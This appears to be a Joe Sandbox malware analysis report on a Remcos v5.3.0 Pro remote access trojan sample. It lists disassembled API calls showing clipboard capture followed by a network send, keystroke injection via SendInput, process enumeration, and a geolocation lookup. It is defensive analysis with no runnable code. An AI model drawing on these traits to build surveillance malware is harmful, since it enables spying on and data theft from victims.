                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$Window$AllocOutputShow
                                                  • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                  • API String ID: 4067487056-2527699604
                                                  • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                  • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                  • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                  • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                  • __alloca_probe_16.LIBCMT ref: 004499E2
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                  • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                  • __freea.LIBCMT ref: 00449B37
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                  • __freea.LIBCMT ref: 00449B40
                                                  • __freea.LIBCMT ref: 00449B65
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: 8c8a116705a4c2baf122adee4ab18fb9808afdf9de7dcd7dac8e0bc8768b82ee
                                                  • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                  • Opcode Fuzzy Hash: 8c8a116705a4c2baf122adee4ab18fb9808afdf9de7dcd7dac8e0bc8768b82ee
                                                  • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                  APIs
                                                  • SendInput.USER32 ref: 00418B08
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                    • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                  • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                  • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                  • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 00415A46
                                                  • EmptyClipboard.USER32 ref: 00415A54
                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                  • OpenClipboard.USER32 ref: 00415A61
                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                  • CloseClipboard.USER32 ref: 00415A89
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID:
                                                  • API String ID: 2172192267-0
                                                  • Opcode ID: 7370d35cba577c54cceb6ee44d46a70f166ae8b80778033efc55827d861f310d
                                                  • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                  • Opcode Fuzzy Hash: 7370d35cba577c54cceb6ee44d46a70f166ae8b80778033efc55827d861f310d
                                                  • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                  APIs
                                                  • _free.LIBCMT ref: 00447EBC
                                                  • _free.LIBCMT ref: 00447EE0
                                                  • _free.LIBCMT ref: 00448067
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                  • _free.LIBCMT ref: 00448233
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: d60a6819c104f3b0c2cf78534b6bb765e33df7d330a3257e7f7d04c9b96b8e07
                                                  • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                  • Opcode Fuzzy Hash: d60a6819c104f3b0c2cf78534b6bb765e33df7d330a3257e7f7d04c9b96b8e07
                                                  • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 67e449e53c8ad906785535aafbfbe26c0ba071591af106f4c86beb5beaf16e94
                                                  • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                  • Opcode Fuzzy Hash: 67e449e53c8ad906785535aafbfbe26c0ba071591af106f4c86beb5beaf16e94
                                                  • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                  APIs
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                  • _free.LIBCMT ref: 00444086
                                                  • _free.LIBCMT ref: 0044409D
                                                  • _free.LIBCMT ref: 004440BC
                                                  • _free.LIBCMT ref: 004440D7
                                                  • _free.LIBCMT ref: 004440EE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID: J7D
                                                  • API String ID: 3033488037-1677391033
                                                  • Opcode ID: 8c925fd0856db186306c7281cb720ff9f4ffcac0ad0a05797528cb4255118f5a
                                                  • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                  • Opcode Fuzzy Hash: 8c925fd0856db186306c7281cb720ff9f4ffcac0ad0a05797528cb4255118f5a
                                                  • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                  • __fassign.LIBCMT ref: 0044A180
                                                  • __fassign.LIBCMT ref: 0044A19B
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                  • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                  • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                  • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                  • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                  • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: HE$HE
                                                  • API String ID: 269201875-1978648262
                                                  • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                  • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                  • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                  • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                  APIs
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                    • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                    • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID: PgF
                                                  • API String ID: 2180151492-654241383
                                                  • Opcode ID: e70769d42ffb53cdc90a18aa5a86959c2d774f9c0fce08565d8f7a58d3c92881
                                                  • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                  • Opcode Fuzzy Hash: e70769d42ffb53cdc90a18aa5a86959c2d774f9c0fce08565d8f7a58d3c92881
                                                  • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                  • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                  • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                  • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                  • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                  • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 79b2a3fe438b863c194c0b5e8c45943ee54d112ae3f9121af085072b05ced17c
                                                  • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                  • Opcode Fuzzy Hash: 79b2a3fe438b863c194c0b5e8c45943ee54d112ae3f9121af085072b05ced17c
                                                  • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                  • int.LIBCPMT ref: 0040FC0F
                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                  • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: P[G
                                                  • API String ID: 2536120697-571123470
                                                  • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                  • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                  • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                  • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 73d5a9f361857d3556796ecfeaec69cbc43bb770c50fe8700ae67d2cee389403
                                                  • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                  • Opcode Fuzzy Hash: 73d5a9f361857d3556796ecfeaec69cbc43bb770c50fe8700ae67d2cee389403
                                                  • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                  APIs
                                                    • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                  • _free.LIBCMT ref: 0044FD29
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                  • _free.LIBCMT ref: 0044FD34
                                                  • _free.LIBCMT ref: 0044FD3F
                                                  • _free.LIBCMT ref: 0044FD93
                                                  • _free.LIBCMT ref: 0044FD9E
                                                  • _free.LIBCMT ref: 0044FDA9
                                                  • _free.LIBCMT ref: 0044FDB4
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                  • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                  • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\NssBkEQKsI.exe), ref: 00406835
                                                    • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                    • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                  • CoUninitialize.OLE32 ref: 0040688E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
